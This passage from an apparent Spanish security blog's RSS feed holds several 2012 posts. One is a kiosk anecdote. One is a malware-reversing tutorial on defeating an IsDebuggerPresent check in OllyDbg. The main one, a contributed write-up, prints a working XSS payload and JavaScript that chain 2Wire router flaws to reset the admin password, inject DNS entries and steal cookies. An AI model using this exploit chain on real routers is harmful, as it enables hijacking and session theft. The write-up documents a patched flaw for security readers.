&lt;div style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-1NCyC4scNZs/T7kXy_BtDsI/AAAAAAAAA2s/5Twnlk0PWrA/s1600/IMG_2662.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://2.bp.blogspot.com/-1NCyC4scNZs/T7kXy_BtDsI/AAAAAAAAA2s/5Twnlk0PWrA/s400/IMG_2662.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;... mi gozo en un pozo! "RAS 631 Error"? No me digas que justo hoy va y se cae el enlace 3G de Vodafone. Visto lo visto con la licencia del Windows XP, a lo mejor les cortaron el acceso por falta de pago :)&lt;br /&gt;
&lt;br /&gt;
Quizá por eso no había nadie en el expositor y dejaron el coche solo. Quizá los comerciales de BMW se fueron a conectar a Internet en otro sitio. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pensé en hacer "la bromita" de un "Imprimir pantalla", esconder todos los iconos y la barra de tareas, y poner el pantallazo como fondo de pantalla… pero ya me dio palo que por tener que dar explicaciones en la comisaría del aeropuerto por estar jugueteando con el ordenador, perdiese el vuelo a Colombia.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Al menos os dejo con otro clásico… la calculadora de Windows!&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-5jrw2SaeTRM/T7kX9S1Q8cI/AAAAAAAAA20/EsgfMFY1JsU/s1600/IMG_2663.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://3.bp.blogspot.com/-5jrw2SaeTRM/T7kX9S1Q8cI/AAAAAAAAA20/EsgfMFY1JsU/s400/IMG_2663.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-5133421323606163793?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/hn2KmK36sEo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/hn2KmK36sEo/bmw-te-gusta-conducir.html</link><author>noreply@blogger.com (Lorenzo Martínez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-VDA3eSHFBJY/T7kTH9yERrI/AAAAAAAAA08/y2BnbuWxSmU/s72-c/bmw_portada.jpg" height="72" width="72" /><thr:total>7</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/bmw-te-gusta-conducir.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-1816208717540306874</guid><pubDate>Thu, 24 May 2012 04:32:00 +0000</pubDate><atom:updated>2012-05-24T16:29:31.490+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">routers</category><category domain="http://www.blogger.com/atom/ns#">2wire</category><category domain="http://www.blogger.com/atom/ns#">cookie hijacking</category><title>Robo de cookies por router vulnerable (caso 2Wire)</title><description>&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-RjOsdHwv6ME/T7kbIJgDb5I/AAAAAAAAA3A/0v-SE9xZIgs/s1600/vulnerabilidad.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-RjOsdHwv6ME/T7kbIJgDb5I/AAAAAAAAA3A/0v-SE9xZIgs/s1600/vulnerabilidad.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Desde hace tiempo es conocido que los routers caseros están plagados de vulnerabilidades. En este caso mostramos como una serie de vulnerabilidades en routers 2Wire, al ser explotadas secuencialmente, permiten obtener remotamente los valores de las cookies de casi cualquier dominio.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El proceso de ataque sería el siguiente: &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
1. La víctima visita una página maliciosa con un módem vulnerable, &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
2. La página realiza pharming al router redirigiendo subdominios al servidor del atacante,&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
3. La página obliga a la víctima a realizar peticiones a los subdominios,&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
4. El atacante recibe en su servidor las cookies de los dominios.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Utilizamos subdominios inexistentes por dos razones. Al usar un subdominio inexistente el navegador no tiene la dirección IP en el cache. Y la segunda razon es que en caso de que exista algún error, la comunicación con el dominio original no se pierde.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Los routers 2Wire han tenido &lt;a href="http://www.routerpwn.com/#wire"&gt;múltiples&lt;/a&gt;&lt;a href="http://www.routerpwn.com/#wire"&gt; vulnerabilidades&lt;/a&gt; en los últimos años. Para realizar este ataque nos enfocamos en las siguientes:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
1. Cross site scripting&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
2. &lt;a href="http://www.hakim.ws/2wire/urlmagico.txt"&gt;Revelación de configuración (“url mágico”)&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
3. &lt;a href="http://www.hakim.ws/2wire/defaultwep-systemkey.jpg"&gt;Reinicialización de contraseña con la clave WEP default&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Algunos routers 2Wire poseen un cross site scripting reflejado en la variable THISPAGE de su interfaz de configuración web:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
http://192.168.1.254/xslt?PAGE=A05&amp;amp;THISPAGE=&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;with(document)body.appendChild(createElement("script")).setAttribute("src","&lt;b&gt;cfgpwn.js&lt;/b&gt;");&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Explotando el cross site scripting podemos estar en la misma zona del router y obtener acceso a sus propiedades, como la información de las páginas del router. &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Inyectamos un script que nos permite leer la información de la configuración debido a la vulnerabilidad de revelación de configuración. Leemos el archivo y obtenemos la WEP default:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;cfgpwn.js:&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
try { &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xmlhttp=new ActiveXObject("MSXML2.XMLHTTP"); &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
} catch(e) { &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xmlhttp = new XMLHttpRequest() &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
}&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.open("GET","/xslt?page=mgmt_data",false);&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.send(null);&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
var info = xmlhttp.responseText;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
var pass = "temporal";&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
var wep = info.substr(info.indexOf("encrypt_key\"\&amp;gt;0x")+15,10);&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Utilizando la clave WEP default podemos definir una nueva contraseña de administración web. De la siguiente manera usamos la WEP para cambiar el password:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.open("POST","/xslt");&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.send("PAGE=A04_POST&amp;amp;THISPAGE=A04&amp;amp;NEXTPAGE=A04_POST&amp;amp;SYSKEY="+wep+"&amp;amp;PASSWORD="+pass+"&amp;amp;PASSWORD_CONF="+pass+"&amp;amp;HINT="+pass);&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Ya que hemos definido un password, podemos obtener la sesión de administrador para obtener privilegios en el router. Para esto realizamos la siguiente petición:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.open("GET","/xslt?PAGE=A02_POST&amp;amp;THISPAGE=&amp;amp;NEXTPAGE=J01&amp;amp;CMSKICK=&amp;amp;PAGE=A02&amp;amp;NEXTPAGE=J01&amp;amp;SHOWHINT=1&amp;amp;PASSWORD="+pass, false);&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.send(null);&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como administradores podemos agregar dominios a la lista de hosts. Agregamos subdominios de los dominios de los cuales queremos las cookies:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
for (var i=0; i&amp;lt;dominios.length; i++) {&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dns=dominios[i];&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
xmlhttp.open("GET","/xslt?PAGE=J38_SET&amp;amp;THISPAGE=J38&amp;amp;NEXTPAGE=J38_SET&amp;amp;NAME="+dns+"&amp;amp;ADDR="+ip,false);&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xmlhttp.send(null);&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
}&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Obligamos a la víctima a realizar peticiones a los subdominios para que envíe las cookies:&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="text-align: justify;"&gt;
for (var i=0; i&amp;lt;dominios.length; i++) {&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dns=dominios[i];&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; document.write('&amp;lt;img src=http://'+dns+'&amp;gt;');&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
}&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Todo esto se podría automatizar y realizar de forma oculta para la víctima. En el siguiente video se muestra la explotación de una forma visible:&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Hay que entender que en este caso 2Wire ha publicado parches para todas estas vulnerabilidades hace tiempo, pero en muchas ocasiones no depende del usuario o fabricante el actualizar, depende del proveedor de servicio.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/HqXDDhTjsWA" title="YouTube video player" width="640"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: right;"&gt;
Contribución cortesía de &lt;b&gt;Pedro “&lt;a href="http://www.twitter.com/_hkm"&gt;hkm&lt;/a&gt;” Joaquín de &lt;a href="http://websec.mx/"&gt;Websec México&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-1816208717540306874?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/vhdr3z-PwwE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/vhdr3z-PwwE/robo-de-cookies-por-router-vulnerable.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-RjOsdHwv6ME/T7kbIJgDb5I/AAAAAAAAA3A/0v-SE9xZIgs/s72-c/vulnerabilidad.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/robo-de-cookies-por-router-vulnerable.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-5653503749288755006</guid><pubDate>Wed, 23 May 2012 06:09:00 +0000</pubDate><atom:updated>2012-05-23T08:09:34.700+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">ollydbg</category><category domain="http://www.blogger.com/atom/ns#">reversing malware tales</category><category domain="http://www.blogger.com/atom/ns#">reversing</category><title>Reversing malware tales: IsDebuggerPresent ?</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-QI5p9ksOA1M/T7rfI6uacSI/AAAAAAAABXU/Z6QpBPYA03I/s1600/Malware.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://2.bp.blogspot.com/-QI5p9ksOA1M/T7rfI6uacSI/AAAAAAAABXU/Z6QpBPYA03I/s200/Malware.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Llevo tiempo queriendo iniciar una saga de posts sobre análisis de malware donde tratar los distintos tipos de análisis, ya sean por comportamiento (&lt;i&gt;sandbox&lt;/i&gt;, herramientas tipo processmonitor, etc) o vía debugger.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Así mismo me fijé como objetivo que fuese sobre muestras 'in the wild'.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Debo agradecer a &lt;a href="https://twitter.com/#%21/javiover"&gt;Javi&lt;/a&gt;, del &lt;a href="https://www.gdt.guardiacivil.es/webgdt/home_alerta.php"&gt;GDT&lt;/a&gt;,&amp;nbsp; su amabilidad a la hora de proveerme de muestras que ellos tienen disponibles por su ímproba labor en la investigación de delitos informáticos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hoy voy a hablar de algo que encontré a la hora de analizar una de las muestras que me facilitaron. Es muy típico de un programa que está orientado a 'cosas oscuras' que incorpore algún tipo de técnica para protegerse de miradas excesivamente curiosas. Muchos utilizan 'packers' para ofuscar el código y otros, como del que vamos a hablar hoy, sencillas técnicas para detectar la presencia de debuggers.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En concreto esta muestra hace uso de la función &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345%28v=vs.85%29.aspx"&gt;IsDebuggerPresent()&lt;/a&gt; para detectar si está siendo ejecutado a través de un debugger.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
¿Cómo detectar que se está haciendo uso de de esta función? El primer paso es abrir la muestra con Ollydbg y ver las llamadas a la API que emplea el malware:&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-VM-cVYxv600/T7rixuKS4gI/AAAAAAAABXg/Srzy7HejP0s/s1600/1-mod.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="366" src="http://2.bp.blogspot.com/-VM-cVYxv600/T7rixuKS4gI/AAAAAAAABXg/Srzy7HejP0s/s400/1-mod.jpg" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Olly nos muestra las diferentes funciones que emplea este espécimen de Malware y de entre toda la lista, nos encontramos con:&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-azbiIWZiklc/T7rkMsdVr0I/AAAAAAAABXw/SQKWS_Ijxc0/s1600/2-mod.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="96" src="http://4.bp.blogspot.com/-azbiIWZiklc/T7rkMsdVr0I/AAAAAAAABXw/SQKWS_Ijxc0/s400/2-mod.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Con lo que tenemos la certeza de que este espécimen, en algún punto, va a intentar averiguar si está siendo analizado por un debugger. Evidentemente esto es bastante sospechoso.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Vamos a poner un breakpoint para tener el control justo cuando el malware vaya a hacer uso de dicha función.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-CLfQxPIakx8/T7rlCU2SH5I/AAAAAAAABX4/hUfEEm95ou4/s1600/3-mod.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="218" src="http://1.bp.blogspot.com/-CLfQxPIakx8/T7rlCU2SH5I/AAAAAAAABX4/hUfEEm95ou4/s400/3-mod.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Y pulsamos F9 para lanzar el programa, que se detendrá justo cuando se vaya a hacer uso de la función&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-5xs7ZCFffzc/T7rlXQXb5ZI/AAAAAAAABYA/6nLxWzYxNik/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-5xs7ZCFffzc/T7rlXQXb5ZI/AAAAAAAABYA/6nLxWzYxNik/s400/4.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Si agrandamos la imagen (click en ella) podemos ver que Olly nos indica que el programa está pausado justo en la función IsDebuggerPresent().&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esta función pertenece a otro módulo (kernel32) por lo que deberemos retornar al programa principal para ver que sucede justo después de esa llamada.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para ello vamos al menú 'Debug' y seleccionamos 'Execute till user code' o pulsamos ALT+F9&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-L2WKv7tevUQ/T7rmeabc-7I/AAAAAAAABYI/dyl4z1B4WME/s1600/5-mod.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="313" src="http://3.bp.blogspot.com/-L2WKv7tevUQ/T7rmeabc-7I/AAAAAAAABYI/dyl4z1B4WME/s400/5-mod.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Lo que nos devolverá al programa principal justo después de la llamada a IsDebuggerPresent()&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-XO5QC2mlkFA/T7rm_1KBEyI/AAAAAAAABYQ/dSp5YUxQ5lU/s1600/6-mod.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="60" src="http://2.bp.blogspot.com/-XO5QC2mlkFA/T7rm_1KBEyI/AAAAAAAABYQ/dSp5YUxQ5lU/s640/6-mod.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Vemos que, justo después, lo que hace el programa es verificar si EAX vale 0 (TEST EAX, EAX), en EAX está almacenado el resultado de la función IsDebuggerPresent() y como en este caso es cierto, el programa se está ejecutando en un debugger, el valor de EAX es 1&lt;br /&gt;
&lt;br /&gt;
Podemos leer en la descripción de IsDebuggerPresent() lo siguiente:&lt;br /&gt;
'&lt;i&gt;If the current process is running in the context of a debugger, the return value is nonzero.&lt;/i&gt;'&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
También vemos que, como el resultado de TEST EAX, EAX no es 0, el flag Z no se activa y permanece a 0 &lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-xx5lmR-1j0Q/T7rn0iWXp4I/AAAAAAAABYY/Q9Gtqcaw4Dc/s1600/6-mod2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-xx5lmR-1j0Q/T7rn0iWXp4I/AAAAAAAABYY/Q9Gtqcaw4Dc/s320/6-mod2.jpg" width="316" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Si pulsamos F7, iremos a la siguiente línea de ensamblador que es un salto condicional JNZ&amp;nbsp; &lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-FyuuwTrRefc/T7rpcOmrroI/AAAAAAAABYg/NybE_ASpwRg/s1600/7-mod.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="303" src="http://1.bp.blogspot.com/-FyuuwTrRefc/T7rpcOmrroI/AAAAAAAABYg/NybE_ASpwRg/s400/7-mod.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como podemos ver si agrandamos la imagen, olly en la parte inferior nos indica que '&lt;i&gt;Jump is taken&lt;/i&gt;', es decir que el va a saltar porque JNZ significa '&lt;b&gt;Jump if NOT Z&lt;/b&gt;' y como el resultado de TEST EAX, EAX no ha activado el flag Z, hará ese salto condicional que nos lleva a una rutina de exit. Obviamente esto no es lo que queremos ya que nos perderemos la parte divertida donde empiezan los fuegos artificiales.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
¿Como resolvemos esta situación? Muy fácil, tan solo tenemos que, en ese punto, hacer doble click sobre el flag Z y cambiar su valor a 1, de esa forma el Jump no se hará y el programa seguirá su curso esperado.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-jCDg4-p5dZo/T7rrf968rHI/AAAAAAAABYo/XO1sBGAHXd8/s1600/8-mod.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-jCDg4-p5dZo/T7rrf968rHI/AAAAAAAABYo/XO1sBGAHXd8/s400/8-mod.jpg" width="372" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Una vez cambiado el flag Z, podemos ver que Olly nos dice que no se hará el salto.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-kaKCyIYck4I/T7rsQS2CSbI/AAAAAAAABYw/GyZalXBhf38/s1600/8-mod2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-kaKCyIYck4I/T7rsQS2CSbI/AAAAAAAABYw/GyZalXBhf38/s400/8-mod2.jpg" width="390" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como hemos visto saltarse esta 'protección' es extremadamente fácil, en este punto podríamos cambiar ese JNZ por NOPs y salvar el fichero con las modificaciones para que la protección quede desactivada para siempre.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
No obstante, hay un método más fácil. Existe un plugin para Olly llamado &lt;a href="http://www.openrce.org/downloads/details/238/Hide_Debugger"&gt;'Hide Debugger'&lt;/a&gt; que directamente lidia con este tipo de 'protecciones' para evitar que el debugger sea detectado. No solo se ocupa de &lt;b&gt;IsDebuggerPresent()&lt;/b&gt; sino de otras técnicas que se emplean habitualmente.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-y_RXYYcXkaU/T7rtMsMBFwI/AAAAAAAABY4/H4PxLxN8ebk/s1600/9.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-y_RXYYcXkaU/T7rtMsMBFwI/AAAAAAAABY4/H4PxLxN8ebk/s1600/9.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-5653503749288755006?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/_YFEwDCLUUc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/_YFEwDCLUUc/reversing-malware-tales.html</link><author>noreply@blogger.com (Yago Jesus)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-QI5p9ksOA1M/T7rfI6uacSI/AAAAAAAABXU/Z6QpBPYA03I/s72-c/Malware.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/reversing-malware-tales.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-3280836435155022281</guid><pubDate>Tue, 22 May 2012 12:23:00 +0000</pubDate><atom:updated>2012-05-22T14:28:58.866+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">seguridad web</category><category domain="http://www.blogger.com/atom/ns#">herramientas</category><category domain="http://www.blogger.com/atom/ns#">uem</category><category domain="http://www.blogger.com/atom/ns#">owasp</category><category domain="http://www.blogger.com/atom/ns#">pfm</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>DoRodri - Falla de Restricción de Acceso a URL</title><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
